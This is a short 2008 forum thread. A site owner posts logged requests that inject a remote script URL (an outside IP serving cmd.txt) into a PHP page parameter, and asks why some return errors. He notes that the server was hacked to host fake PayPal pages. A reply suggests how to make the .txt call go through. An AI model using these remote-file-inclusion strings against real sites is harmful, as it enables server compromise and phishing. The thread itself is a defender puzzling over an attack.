Exploit ...

Discussion in 'General Chat' started by redhits, Feb 19, 2008.

  1. #1
    I saw in my server logs that somebody it's using a php script to access pages like


    http://softgroups.com/main.php?s=http://140.128.187.8/cmd.txt??



    I don't get it, why that page return an 403 error?!

    this also return an 404 one!
    http://softgroups.com/index.php?s=http://140.128.187.8/cmd.txt??


    this works, ....

    http://softgroups.com/index.php?s=http://google.com/login.php??

    so it's only return 403 when i am putting an .txt ? why ?!

    take a look

    http://softgroups.com/index.php?s=http://google.com/cmd.php?? OK
    http://softgroups.com/index.php?s=http://google.com/cmd.txt?? - 403



    I am asking this question because this server has been hacked by somebody who put PayPal fake pages there, and mass e-mailing software.
     
    redhits, Feb 19, 2008 IP
  2. nico_swd

    nico_swd Prominent Member

    Messages:
    4,153
    Likes Received:
    344
    Best Answers:
    18
    Trophy Points:
    375
    #2
    If you remove the question marks at the end of the txt URL it works too. I guess your server doesn't allow to call static pages (txt) dynamically?
     
    nico_swd, Feb 20, 2008 IP
  3. redhits

    redhits Notable Member

    Messages:
    3,023
    Likes Received:
    277
    Best Answers:
    0
    Trophy Points:
    255
    #3
    well i think it's an exploit, because they call a file with cmd.txt ... and also ...i see a lot of people from lot's of IP doing this.

    And the user-agent it's lubcurl or php ...
     
    redhits, Feb 20, 2008 IP